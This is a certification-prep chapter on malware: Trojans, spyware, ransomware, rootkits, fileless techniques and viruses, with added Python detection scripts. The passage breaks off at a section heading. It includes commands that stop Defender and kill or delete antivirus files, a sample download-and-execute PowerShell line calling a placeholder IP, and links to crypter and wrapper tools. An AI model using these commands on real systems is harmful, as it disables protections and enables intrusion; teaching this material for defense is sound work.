Chapter 4. Malware

This chapter covers the following CEH exam objectives:

• Understanding viruses

• Awareness of malware delivery mechanisms

• How Trojan horses function

• Insight into spyware

Malware Types

Malware is a rather broad term that applies to any software that has a malicious intent or purpose. There are many types of malware today. In addition, modern malware often falls into multiple categories. As one example, you might encounter a virus that spreads and then delivers spyware to infected computers. Malware is becoming increasingly common and, at least in some cases, more advanced.


Exam Alert

Having a detailed knowledge of the various types of malware is critical for the CEH exam.


Trojan Horses

A Trojan horse is malware that appears to have a legitimate purpose but that delivers something malicious. This can be done in one of two ways. The attacker can write a new program that does something innocuous (weather monitor, poker game, etc.) but that has hidden functionality. That is the less common approach. The more common approach is to use a tool to wrap an existing program around malware. Then, a victim who installs the software also installs the malware.

Trojan horses are used for a wide range of purposes. They can be used to deliver spyware or backdoors. There are Trojan horses that disable firewalls, antivirus software, and other security measures. A Trojan horse may use a victim machine to send spam, start a denial of service (DoS) attack, or act as a proxy server for the attacker to route traffic through.

There are quite a few known Trojan horses. Many of the classic ones listen on well-known default TCP ports, which is why those ports appear in port-scan and IDS signatures; keep in mind that the port is almost always configurable, so a clean scan of these ports proves nothing by itself. Table 4.1 lists several of these ports. Note that Table 4.1 uses the term RAT, which stands for remote access Trojan. The primary purpose of this type of Trojan is to give the attacker remote access to the system.

Table 4.1 Some Known Trojan Horses and Their Specific TCP Ports

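The check a practitioner would actually run against Table 4.1 is a cross-reference of listening ports against the known defaults. The following is an added example, not code from the original chapter; its port table is my own short list of widely documented defaults (NetBus, SubSeven, Back Orifice 2000) rather than a copy of the table, the netstat output is constructed, and, as the lead text says, a miss proves nothing because the attacker can change the port.

```python
"""Cross-check TCP listeners against the default ports of classic Trojan
horses.  Added example, not from the original chapter, and the port table is
my own short list of widely documented defaults rather than a copy of Table
4.1.  Because every one of these tools lets the attacker pick another port,
a hit is a lead to follow up, and a miss proves nothing."""
import re

# Assumed historical defaults (TCP).  The original Back Orifice listened on
# UDP 31337, which a TCP-only parser like this one deliberately will not see.
KNOWN_TROJAN_PORTS = {
    12345: "NetBus",
    12346: "NetBus",
    27374: "SubSeven",
    54320: "Back Orifice 2000",
}

# One row of `netstat -ano` on Windows, e.g.
#   TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING       4128
NETSTAT_LINE = re.compile(
    r"^\s*TCP\s+(?P<laddr>\S+):(?P<lport>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def parse_listeners(netstat_output):
    """Return [(port, pid, local_address)] for every TCP socket in LISTENING state."""
    listeners = []
    for line in netstat_output.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            listeners.append((int(m.group("lport")), int(m.group("pid")), m.group("laddr")))
    return listeners


def flag_trojan_ports(netstat_output, known=KNOWN_TROJAN_PORTS):
    """Return {port: (trojan name, pid)} for listeners on a known default port."""
    hits = {}
    for port, pid, _addr in parse_listeners(netstat_output):
        if port in known:
            hits[port] = (known[port], pid)
    return hits


# Constructed sample output; not captured from a real machine.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING       4128
  TCP    127.0.0.1:12345        0.0.0.0:0              LISTENING       2200
  TCP    192.0.2.10:49731       198.51.100.7:443       ESTABLISHED     3100
  UDP    0.0.0.0:31337          *:*                                    5555
"""

if __name__ == "__main__":
    for port, (name, pid) in sorted(flag_trojan_ports(SAMPLE_NETSTAT).items()):
        print(f"port {port} is the default of {name}; owned by PID {pid}, "
              f"inspect it with: tasklist /FI \"PID eq {pid}\"")
```

On a real host, feed it the output of netstat -ano and then identify the owning process by PID; the name and path of that process, not the port number, is what decides whether the listener is malicious.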

While the term Trojan horse is used to describe any software that is designed to deliver a malicious payload, there are specialized Trojan horses, including:

Remote access Trojan: This type of Trojan is specifically designed to deliver remote access utilities to the target system.

Proxy trojan: This type of Trojan essentially turns the target system into a proxy server, so the attacker can use that system as a base to attack other systems.

FTP Trojan: This type of Trojan initiates an FTP server on the target machine so the attacker can upload or download files.

Data stealing Trojan: As the name suggests, this type of Trojan is designed to deliver spyware and steal data. A subset of this type, called a banking Trojan, specifically targets financial data on the target system.

Destructive Trojan: As the name indicates, this type of Trojan delivers malware that will cause damage to the target system. It might delete system files, interfere with system operations, or conduct other types of destructive activities.

Command shell Trojan: This type of Trojan delivers some sort of command line remote access tool. For example, netcat is often used by network administrators to communicate between machines. A command shell Trojan might deliver netcat and have it listen on the victim machine so that the attacker can connect and execute commands.

Covert channel tunneling tool (CCTT) Trojan: This type of Trojan creates arbitrary data transfer channels in the data streams authorized by a network access control system.

Defacement Trojan: This type of Trojan is used to deface either a website or an application. It is possible to find on the internet defacement Trojans that can deface standard Windows applications such as the Calculator app.

The basic process of delivering a Trojan involves these steps:

1. Create a new Trojan packet using one of the many tools available on the internet.

2. Create a dropper that installs the malicious code on the target system.

3. Create a wrapper using wrapper tools to install the Trojan on a victim's computer.

4. Propagate the Trojan.

5. Execute the dropper.

6. Execute whatever malicious code you wish.

Not every Trojan delivery involves all these steps, but many do.

eLiTeWrap is a common Trojan horse tool that is easily found on and downloaded from the internet. It is easy to use. Essentially, it can bind any two programs together. Using a tool such as this one, anyone can bind a virus or spyware to an innocuous program such as a shareware poker game. This would lead to a large number of people downloading what they believe is a free game and unknowingly installing malware on their systems.

The eLiTeWrap tool is a command line tool that is very easy to use. Just follow these steps (see Figure 4.1):


Figure 4.1 eLiTeWrap

DarkHorse Trojan Virus Maker is another tool for wrapping programs. It has a nice GUI interface that makes it even easier to work with than eLiTeWrap. You can see this tool in Figure 4.2.


Figure 4.2 DarkHorse Trojan Maker

There are many more tools for wrapping programs. A few are listed here:

• Advanced File Joiner https://download.cnet.com/Advanced-File-Joiner/3000-2094_4-169639.html

• Hidden Cry https://pentesttools.net/hidden-cry-windows-crypter-decrypter-generator-with-aes-256-bits-key/

• Exe2vbs https://github.com/rapid7/metasploit-framework/blob/master/tools/exploit/exe2vbs.rb

• IExpress Wizard https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/iexpress-wizard-for-win-server

In addition to these wrappers, there are a number crypters available, as well:

• SwayzCryptor https://guidedhacking.com/threads/swayzcrypter.5778/

• Cypherx https://cypherx-crypter.updatestar.com/en

• Java Crypter https://www.secrethackersociety.com/product/java-crypter/

• BetaCrypt https://www.secrethackersociety.com/product/betacrypt/

• Spartan Crypter https://www.silentexploits.com/spartan-crypter/

• BitCrypter https://www.crypter.com/

Remember that a Trojan horse can be used to deliver anything. So sometimes Trojan horses are categorized by what they deliver. The following are some of the many types of Trojan horses:

Backdoor

As the name suggests, a backdoor is malware that gives the attacker remote access to the target machine. One common way this can be done is by using a Trojan horse to wrap a remote desktop program inside some other program. Then, when the target installs the harmless program, they are also installing remote desktop capabilities. A remote desktop tool often cited for this is Timbuktu. Timbuktu Pro is functionally very much like Microsoft Remote Desktop; it is a commercial product, not open source, and any remote control tool the victim does not know about serves the same purpose.

Spyware

As discussed briefly in Chapter 3, “System Hacking,” spyware is software that monitors a user's computer in some way. It can be a keylogger, screen grabber, etc. One reason spyware is so common is that there are legal uses for it. For example, you can easily find software designed for parents to monitor their minor children online; this is simply legal spyware. Similarly, there are tools marketed for companies to monitor employees on the company network; again, this is legal spyware. However, it is possible to use such tools for illegal purposes. In addition, there are tools designed as illegal spyware. Some of them purport to be security applications, but they are really spyware. The following tools fall into this category:

• AntiVirus Gold

• MacSweeper

• Spy Wiper

• Spysheriff

• Windows Police Pro

The term spyware first appeared in a Usenet post in 1995. The problem has grown enormously since then. The antivirus company Kaspersky defines four types or categories of spyware:

Trojan spyware: This type of spyware enters devices via Trojan malware, which delivers the spyware program.

Adware: This type of spyware may monitor you to sell data to advertisers or serve deceptive malicious ads.

Tracking cookie files: This type of spyware can be implanted by a website to follow you across the internet.

System monitors: This type of spyware tracks any activity on a computer, capturing sensitive data such as keystrokes, sites visited, email addresses, and more. Keyloggers typically fall into this group.

Ransomware

Ransomware, which is a growing problem, is often delivered as a virus or Trojan horse. The distinguishing characteristic of ransomware is that it blocks some use of your computer and demands payment. It may, for example, encrypt files then demand payment for the decryption key; this is also known as crypto ransomware. Or the ransomware may lock your entire computer and demand payment.

One of the most widely known ransomware attacks was CryptoLocker. This ransomware was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user's files. Several varieties of CryptoLocker have been detected. CryptoWall is a variant of CryptoLocker first found in August 2014. It looked and behaved much like CryptoLocker. In addition to encrypting sensitive files, it would communicate with a command and control server and even take a screenshot of the infected machine. By March 2015, a variation of CryptoWall was discovered to be bundled with the spyware TSPY_FAREIT.YOI; it actually steals credentials from the infected system in addition to holding files for ransom. WannaCry is a more recent ransomware that spread rapidly across a number of computer networks in May 2017, propagating on its own as a worm between unpatched Windows machines. After infecting a Windows computer, it encrypted the files on the PC's hard drive, making them impossible for users to access, and then the perpetrator demanded a ransom payment in bitcoin in order to decrypt them.

Another example occurred in 2020, when Universal Health Services was hit by a ransomware attack. Although no one is certain, many analysts believe the specific ransomware in this case was malware named Ryuk. Whatever the name of the ransomware, the attack caused $67 million in damages. You can learn more about Ryuk at https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/.

Rootkits

Rootkits, which were introduced in Chapter 3, "System Hacking," are examined again in this section. A rootkit is malware designed to keep privileged (root or administrator) access to a system while hiding its own presence and that of other malicious components. The name comes from root, the administrative account on Unix and Linux. An intruder installs a rootkit on a computer after first obtaining access by some other means. There are many ways to do this. One is to take advantage of a known vulnerability. Another method is cracking a password. If that initial access is only at the user level, the rootkit's installer must also escalate privileges. Once in place, a rootkit may also collect user IDs and passwords for other machines on the network, extending the attacker's privileged access.

There are actually several types of rootkits. The major types are listed here:

Bootloader rootkit: This type of rootkit replaces the original boot loader with one that is controlled by the attacker.

Kernel rootkit: This type of rootkit either adds malicious code to or replaces the original OS kernel or device drivers.

Library rootkit: This type of rootkit replaces certain system libraries with fake libraries controlled by the attacker.

Hypervisor rootkit: This type of rootkit functions as a hypervisor and modifies the boot sequence of the computer system to load the host operating system as a virtual machine.

Hardware/firmware rootkit: This type of rootkit is much less common than the others. It is a rootkit in hardware devices or platform firmware.

Application rootkit: This type of rootkit replaces normal application binaries with malicious code. Such a rootkit can also work by modifying the behavior of existing applications by injecting malicious code.

Fileless Malware

Fileless malware has become a growing threat. This type of malware does not write a malicious executable to disk on the target system. Instead, it uses existing, legitimate system programs (an approach often called living off the land) to attack the target system. A common example is PowerShell in Windows. PowerShell 1.0 was released in 2006 and has shipped as a built-in component since Windows 7. It provides a great deal of functionality that can be misused. It is possible to do any number of activities in PowerShell. For example, the following two commands both stop a security component: the first stops the Microsoft Defender Antivirus service (service name WinDefend), and the second kills a hypothetical process named antivirus.exe:

Stop-Service -Name WinDefend -Force
Get-Process antivirus | Stop-Process -Force

On current Windows builds, Defender's tamper protection is designed to block the first command, and a failed attempt to stop an antimalware service is itself a strong indicator worth alerting on.

It is also possible to use Windows Management Instrumentation (WMI) to perform similar tasks. WMI has a number of classes that can be used in scripts (and from PowerShell via Get-WmiObject or Get-CimInstance) to gather information and perform tasks. A few of these classes are listed here:

Win32_ApplicationService: This WMI class represents any installed or advertised component or application available on the system.

Win32_Account: This abstract WMI class contains information about user accounts and group accounts known to the Windows system.

Win32_ComputerSystem: This WMI class represents a computer system operating in a Windows environment.

Win32_LogicalDisk: This WMI class represents a data source that resolves to an actual local storage device on a Windows system.

You can get more information on WMI from the following sources:

WMI Samples: https://www.activexperts.com/admin/scripts/wmi/

Example: Getting WMI Data from the Local Computer: https://docs.microsoft.com/en-us/windows/win32/wmisdk/example--getting-wmi-data-from-the-local-computer

The net command in Windows is a standard command line tool that has many subcommands and that is also abused by fileless malware. The following are some examples:

net use: This command connects the computer to, or disconnects it from, a shared resource, or displays information about the computer's current connections.

net view: This command displays the computers in the local domain or workgroup.

net view \\ComputerName: This command shows the shares on the specified computer.

net file: This command displays all open shared files on a server and their lock IDs.

net session \\ComputerName: This command lists the session from the specified machine.

net session: This command lists all sessions on the current machine.

net share sharename: This command displays information about the specified local share.

net start servicename: This command starts the named service.

net stop servicename: This command stops the named service.

Common service names used with net start and net stop include:

browser

alerter

messenger

"routing and remote access"

schedule

spooler

Note that alerter and messenger exist only on Windows XP/Server 2003 and earlier; they were removed in later versions. Starting or stopping a service is recorded by the Service Control Manager (event 7036 in the System log), which makes net stop against a security service a useful detection point.

PowerShell, WMI, and the net command were all designed for legitimate uses by Windows administrators. Fileless malware simply exploits these tools.
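Because these tools are legitimate, detection has to look at how they are invoked rather than whether they run. The following is an added example, not code from the original chapter: it scans process command lines and PowerShell script-block text (the data Windows records as event 4688 with command-line auditing and PowerShell event 4104), decodes -EncodedCommand payloads, and reports why a record looks like living-off-the-land activity against the PowerShell, WMI and net commands discussed above. The pattern list is my own assumption, and the sample records are constructed, not captured from a real host.

```python
"""Detection logic for PowerShell / WMI / net.exe abuse.  Added example, not
from the original chapter.  It scans command lines and script-block text,
decodes -EncodedCommand payloads, and reports why a record looks like
living-off-the-land activity.  The pattern list is an assumption, and
SAMPLE_RECORDS are constructed, not captured from a real host."""
import base64
import re

# Each entry: (pattern over the command line or script text, what it indicates).
SUSPICIOUS = [
    (re.compile(r"\bStop-Service\b.*(?:WinDefend|Defender|Antimalware|MsMpSvc)", re.I), "stops an antimalware service"),
    (re.compile(r"\bSet-MpPreference\b.*-Disable", re.I), "disables a Defender setting"),
    (re.compile(r"\bInvoke-Expression\b|\biex\b", re.I), "evaluates dynamically built code"),
    (re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest", re.I), "downloads content at runtime"),
    (re.compile(r"\bInvoke-WmiMethod\b.*Win32_Process|Win32_Process.*\bCreate\b", re.I), "spawns a process through WMI"),
    (re.compile(r"\bnet(?:1)?(?:\.exe)?\s+(?:stop|start|use|view|session|share)\b", re.I), "runs a net command"),
]

# powershell.exe accepts -e, -enc or -EncodedCommand (case-insensitive)
# followed by base64 of the script encoded as UTF-16LE.
ENCODED_FLAG = re.compile(r"(?:-|/)e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_for_powershell(script):
    """Produce what `powershell -EncodedCommand` expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Return the list of reasons one log record looks suspicious (empty if clean)."""
    text = record["text"]
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("uses -EncodedCommand, decoded: %r" % decoded.strip())
        text = text + "\n" + decoded          # match the patterns against the decoded script too
    for pattern, why in SUSPICIOUS:
        if pattern.search(text):
            reasons.append(why)
    return reasons


def scan(records):
    """Return {record id: reasons} for every record with at least one finding."""
    findings = {}
    for record in records:
        reasons = analyze(record)
        if reasons:
            findings[record["id"]] = reasons
    return findings


# Constructed sample records: id plus command line or script-block text.
SAMPLE_RECORDS = [
    {"id": 1, "text": "powershell.exe Get-Service -Name Spooler"},
    {"id": 2, "text": "powershell.exe -NoP -W Hidden -EncodedCommand "
                      + encode_for_powershell("Stop-Service -Name WinDefend -Force")},
    {"id": 3, "text": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"id": 4, "text": "Invoke-WmiMethod -Class Win32_Process -Name Create "
                      "-ArgumentList 'cmd /c net stop spooler'"},
]

if __name__ == "__main__":
    for rec_id, reasons in scan(SAMPLE_RECORDS).items():
        print(f"record {rec_id}:")
        for why in reasons:
            print("   -", why)
```

The decoding step matters more than the pattern list: an encoded command hides every cmdlet name from a naive string match, so any detection that does not decode UTF-16LE base64 first will miss exactly the invocations attackers prefer.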

Botnet

A botnet is a network of compromised computers. One or more computers act as the command and control (C2) node, and the others are zombie machines whose owners are not willing participants in the activity. One way a botnet can be assembled is by sending a Trojan horse that has a payload which gives the command and control node control over the machine. Attackers can use a botnet for whatever purpose they want. An entire botnet can be used, for example, to launch a massive distributed denial of service (DDoS) attack against a target. Or a botnet can be used for its distributed computing power to crack passwords.

Advanced Persistent Threats

Advanced persistent threats are, as the name suggests, advanced attacks. They are often perpetrated by nation-state actors. The definition is in the name: Such an attack must be advanced, and it must also be persistent (that is, take place over a long period of time). Such attacks are usually subtle and hard to detect. The term advanced persistent threat is said to have been coined by the U.S. Air Force in 2006. These attacks often involve multiple separate pieces of malware.

Exploit Kits

Exploit kits, sometimes called crimeware toolkits, are platforms for delivering exploits and payloads to a target. Many of them are multipurpose and can deliver spyware, Trojan horses, backdoors, rootkits, and other malware. A few well-known exploit kits are:

• Terror

• Sundown

• Neutrino

• Angler

• RIG Exploit Kit

How Malware Spreads

Malware can spread in a number of different ways. The following are the most common ways:

• Email attachments

• Instant messaging attachments

• Websites that are infected

• Portable media

• Any download from the internet

• File sharing services

• Direct installation over wireless networking

When distributing malware through an infected website, the attacker can use a number of techniques to get more victims. Blackhat search engine optimization (SEO) is one popular method; it involves using illicit means to push the infected site's ranking higher in search engines. Clickjacking tricks users into clicking on something other than what they believe they are clicking, typically by placing an invisible element (such as a transparent frame) over a visible page. When delivering malware via websites, the attacker may set up a fake website to infect visitors. Another approach is to inject malware into legitimate websites.

In addition to website-based attacks, malware can be delivered via exploiting flaws in a browser or simply attaching to an email and using social engineering to convince the user to open the attachment. Malvertising is another method of malware delivery; with this method, the malware is embedded in legitimate ads or entire ad networks.

Malware can also spread via compromised applications (in Trojan horses). Malware can be attached to a legitimate file and spread when users download or install the legitimate file. You saw earlier in this chapter how simple and free tools such as eLiTeWrap can be used to accomplish this.


Exam Alert

The CEH exam will absolutely ask you about the various delivery mechanisms for malware. Make sure you are very familiar with them.


Malware Components

Malware can be made of various components. Of course, not all malware has every component, but Table 4.2 describes the components that are often part of malware.

Table 4.2 Some Components of Malware


Malware Evasion Techniques

Obviously, the creator of malware does not want the malware to be detected. We have already seen some methods for avoiding detection, including hiding the malware in a Trojan horse. Another method is changing the file extension so the file appears harmless. Appending random bytes to the end of a file is another: it changes the file's hash, so hash-based blocklists no longer match, and it defeats naive whole-file signatures.

There are also some rather technical techniques for covertly executing code on systems. One technique, DLL injection, involves causing code to execute within the address space of some other process. This is accomplished by forcing the targeted program to load a DLL (dynamic link library). Multiple techniques can be used to accomplish this. For example, specific registry keys can be useful. One of them is the AppInit_DLLs value under

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Every DLL listed in AppInit_DLLs is loaded into every process that loads User32.dll, and User32.dll is used by nearly every program with a user interface. Therefore, if an attacker can get a DLL listed in that value, it will be loaded along with a great many programs. Two caveats: the value takes effect only when LoadAppInit_DLLs in the same key is 1, and on Windows 8 and later with Secure Boot enabled the mechanism is disabled entirely. On 64-bit Windows, 32-bit processes read the copy of the key under Wow6432Node.

Another registry key that can be used for DLL injection is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs

Any DLL listed in this key will be loaded into every process that calls the Win32 API functions CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW, or WinExec. This also covers a large number of programs. Both locations are well known, so monitoring them for changes is a standard detection practice.
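A concrete audit of those two locations is simple to write. The following is an added example, not code from the original chapter. The check itself works on plain dictionaries so that it runs on any platform against the constructed snapshots included below; the read_live_values() helper reads the real keys with Python's winreg module and is only meaningful on Windows. The two sample snapshots and the DLL paths in them are made up for illustration.

```python
"""Audit the AppInit_DLLs and AppCertDLLs registry locations.  Added example,
not from the original chapter.  audit_injection_keys() works on plain dicts so
it runs anywhere; read_live_values() needs winreg and therefore Windows.
CLEAN and SUSPECT are constructed snapshots, not captured from a real host."""
import sys

APPINIT_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
APPCERT_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs"
# 32-bit processes on 64-bit Windows read this copy instead of APPINIT_KEY.
APPINIT_KEY_WOW64 = r"SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows"


def audit_injection_keys(appinit_values, appcert_values):
    """appinit_values: {value name: data} under APPINIT_KEY.
    appcert_values:  {value name: DLL path} under APPCERT_KEY.
    Returns a list of findings; an empty list means nothing is configured."""
    findings = []
    raw = str(appinit_values.get("AppInit_DLLs", "") or "")
    dlls = [d for d in raw.replace(",", " ").split() if d]      # space- or comma-separated list
    load_flag = int(appinit_values.get("LoadAppInit_DLLs", 0) or 0)
    require_signed = int(appinit_values.get("RequireSignedAppInit_DLLs", 0) or 0)
    if dlls:
        state = "active" if load_flag else "listed but inactive (LoadAppInit_DLLs=0)"
        findings.append(f"AppInit_DLLs {state}: {', '.join(dlls)}")
        if load_flag and not require_signed:
            findings.append("RequireSignedAppInit_DLLs is 0, so unsigned DLLs would be loaded")
    for name, path in appcert_values.items():
        # Any value here is unusual on a workstation: each one is a DLL loaded
        # into every process that calls CreateProcess and its relatives.
        findings.append(f"AppCertDLLs entry {name!r} -> {path}")
    return findings


def read_live_values():
    """Windows only: return (appinit_values, appcert_values) read from HKLM."""
    if sys.platform != "win32":
        raise OSError("winreg is only available on Windows")
    import winreg

    def dump(subkey):
        values = {}
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                index = 0
                while True:
                    try:
                        name, data, _type = winreg.EnumValue(key, index)
                    except OSError:            # no more values
                        break
                    values[name] = data
                    index += 1
        except FileNotFoundError:
            pass                                # key absent: nothing configured
        return values

    return dump(APPINIT_KEY), dump(APPCERT_KEY)


# Constructed snapshots of the two keys (hypothetical DLL paths).
CLEAN = ({"AppInit_DLLs": "", "LoadAppInit_DLLs": 0, "RequireSignedAppInit_DLLs": 1}, {})
SUSPECT = ({"AppInit_DLLs": r"C:\Users\Public\helper.dll", "LoadAppInit_DLLs": 1,
            "RequireSignedAppInit_DLLs": 0},
           {"CertHook": r"C:\Windows\Temp\certhook.dll"})

if __name__ == "__main__":
    values = read_live_values() if sys.platform == "win32" else SUSPECT
    for line in audit_injection_keys(*values) or ["nothing configured in either key"]:
        print(line)
```

On a real system, run the audit once to record a baseline and again on a schedule; a DLL that appears in either location between two runs is worth investigating even if it is signed, since the legitimate population of AppInit and AppCert DLLs on a workstation is close to empty.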

In addition to DLL injection, process hollowing is another technical method for hiding malware. In this technique, malware runs under the name and process object of a genuine, trusted program. The malware creates a legitimate process (for example, a signed system binary) in a suspended state, so that it is loaded into memory but its main thread has not started. It then unmaps or overwrites the legitimate executable image in that process's memory, writes its own code in its place, points the main thread's entry point at that code, and resumes the thread. Process listings show the legitimate program name and path, but the code actually executing is the attacker's. A common detection is to compare the image on disk with what is mapped in memory, or to look for a process whose main executable region is not backed by a file.

Viruses

A computer virus is a program that self-replicates. Some sources define a virus as a file that must attach to another file, such as an executable, in order to run. While this definition is sufficient to define a virus, most viruses do far more than simply replicate.

Types of Viruses

There are many different types of viruses. In this section we briefly look at some of the major virus types.

Viruses can be classified by either the method they use for propagation or their activities on the target computers:

File virus: A file virus infects executable files and runs whenever the infected host program is executed. It is a common type of virus.

System virus: A system virus attempts to compromise some portion of a system. For example, a boot sector virus attempts to infect the boot process of the target system.

Macro virus: A macro virus infects the macros in Microsoft Office documents. Microsoft Office products such as Word and Excel allow users to write mini-programs called macros to automate tasks. A macro virus can be written into a macro in some business applications. For example, Microsoft Outlook is designed to allow a programmer to write scripts using a subset of the Visual Basic programming language called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If a macro virus script is attached to an email and the recipient is using Outlook, then the script can execute and do any number of things, including scan the address book, look for addresses, send out email, or delete email.

Multi-partite virus: A multi-partite virus can attack a computer in multiple ways, such as by infecting the boot sector of the hard disk and one or more files.

Cluster virus: A cluster virus modifies some directory table so that it points users to the virus rather than to the actual program. For example, it might alter the file that maintains information for the file system (MFT in Windows).

Memory-resident virus: A memory-resident virus installs itself and then remains in RAM from the time the computer is booted up to when it is shut down.

Armored virus: An armored virus uses techniques that make it hard to analyze. Code obfuscation is one such method: the code is written such that if the virus is disassembled, the logic is not easily followed. Compressing or encrypting the code is another method for armoring a virus.

Sparse infector virus: A sparse infector virus attempts to elude detection by performing its malicious activities only sporadically. With a sparse infector virus, the user sees symptoms for a short period and then sees no symptoms for a time. In some cases, a sparse infector virus targets a specific program but executes only every 10th time or 20th time that the target program executes. Or a sparse infector virus may have a burst of activity and then lie dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: This type of virus reduces the frequency of attack and thus reduces the chances for detection.

Polymorphic virus: A polymorphic virus changes its form from one infection to the next to avoid signature-based detection. Typically the body of the virus is encrypted with a new key each time and prefixed with a small decryptor routine that is itself varied, so there is no constant byte sequence for a scanner to match until the virus has decrypted itself in memory.

Metamorphic virus: This is a more advanced relative of the polymorphic virus that rewrites its own code into functionally equivalent but different instructions on each generation, so there is not even a constant decrypted body to match. This type of virus is very rare.

Boot sector virus: Some sources list boot sector viruses separately from system and file viruses. As the name suggests, this type of virus infects the boot sector of the drive. It can be difficult to find antivirus software for this type of virus, because most antivirus software runs within the operating system, not in the boot sector.

Overwriting/cavity virus: This type of virus embeds itself in a host file and overwrites part of the host file so that it does not increase the length of the file.

File extension virus: This type of virus changes the extension of a file. So, for example, such a virus might make a .vbs (Visual Basic script) file appear to be a .txt (text) file.

Terminate and stay resident (TSR) virus: This type of virus remains permanently in the memory during an entire work session, even after the target host’s program is executed and terminated. In some cases, it can be removed by rebooting the system; in other cases, even a reboot will not remove the virus.

Companion virus: This type of virus does not modify the executable it targets. Instead, it creates a companion file that gets run in its place, for example a program.com beside program.exe (the Windows command interpreter tries .com before .exe when only the base name is typed) or a same-named file earlier in the search path. The companion runs the virus and then, usually, the legitimate program, so the user notices nothing.

Creating a Virus

As you can probably imagine, there are tools freely available on the internet for creating viruses. One well-known tool is TeraBIT Virus Maker. You can see this tool in Figure 4.3.


Figure 4.3 TeraBIT Virus Maker

Some of the actions you can select are merely annoying, such as avoiding opening Notepad. Others are quite malicious, such as formatting all hard drives. Notice that there is also an option to spread a virus with removable devices.

TeraBIT is not the only easy-to-use GUI virus-making tool available. Another interesting GUI virus maker is Virus Maker from BlackHost (http://www.blackhost.xyz). There are several interesting things about this tool. In addition to doing typical things like changing mouse behavior, Virus Maker can open a website. This makes it useful for penetration testing. You can have it simply open a website that describes why a user should be careful with attachments. You can see this tool in Figure 4.4.


Figure 4.4 BlackHost Virus Maker

There are, of course, many tools for making worms as well. Recall that a worm is self-replicating code that spreads on its own across a network, without needing to attach itself to a host file the way a classic virus does. In practice, many things we call viruses today are really worms. One of the most well-known worm makers is the Internet Worm Maker Thing. You can see this tool in Figure 4.5.


Figure 4.5 Internet Worm Maker Thing

In addition to using tools to write viruses, you can write them by using scripts or batch files. For example, here is a simple VBScript virus:

Dim msg, sapi
msg = "You have violated security policies"
Set sapi = CreateObject("SAPI.SpVoice")
sapi.Speak msg

Strictly speaking, this script is a payload rather than a virus, because it does not replicate; it is particularly useful for penetration testing precisely because it causes no harm to the target computer. Instead, it simply embarrasses the computer operator by pointing out that they opened an attachment.

You can, of course, alter the message to suit your needs. A bit of investigation online into the Microsoft Speech API will also show you some additional variations you can consider, such as this one:

sapi.Volume = 100
Set sapi.Voice = sapi.GetVoices.Item(0)

This is a VBScript script, so you should save it as a .vbs file. This script allows you to test whether users will click on an attachment, particularly one that is a script.

There are certainly more harmful batch files. For example, the following batch file, if executed by someone with administrative privileges, will kill antivirus processes:

tskill /A ZONEALARM
tskill /A mcafe*

This can be followed with del to delete the files for that antivirus:

del /Q /F "C:\Program Files\kasper~1\*.exe"
del /Q /F "C:\Program Files\kaspersky\*.*"

Note that /Q specifies quiet mode, which means the user does not get a prompt before the file is deleted. /F indicates to ignore the read-only attribute and delete the file anyway. Also note that in this example, only three specific antivirus products are targeted (ZoneAlarm, McAfee, and Kaspersky). The list can be extended, although modern antivirus products protect their own processes and program directories, so commands like these generally fail even when run by an administrator.

More recent versions of Windows may not include tskill (it is part of the Remote Desktop Services tools), but they do include the related command taskkill, which is more powerful: taskkill /F /IM name.exe forcibly ends every process with that image name.

Logic Bombs

A logic bomb is software that does whatever its misdeed is when a particular condition (trigger) is met. Perhaps it will begin deleting the files on a web server on a given date. There have been multiple cases of programmers being charged with felonies after putting logic bombs on their company systems to delete files should their employment be terminated.

In 2019, a contract employee for Siemens, David Tinley, pleaded guilty to charges of creating a logic bomb. The purpose of his logic bomb was to, after a period of time, cause the software he had developed for the company to malfunction. He planned for the logic bomb to cause Siemens to have to call him back to fix it so he could make more money.

Protecting Against Malware

Using antivirus software can be a good first step in protecting a system from viruses. (Antivirus is the term still used, though we usually mean antimalware because such systems protect against all forms of malware.) But it is not the only technique.

Indicators of Malware

Before you can defend against malware, you need some indication that it is present. Some malware can be sophisticated enough to provide very few clues as to its presence. However, most malware attacks become known through the disruption they cause. A few common indicators that might suggest malware is on a system include:

• Processes take more resources and time than usual.

• Files and folders are missing.

• The system suddenly runs out of storage space.

• The computer freezes frequently.

• The computer crashes frequently (on Windows, with a BSOD [blue screen of death]).

• Unexplained popup windows appear.

• Files or folders are in places where they should not be.

Sheep Dipping

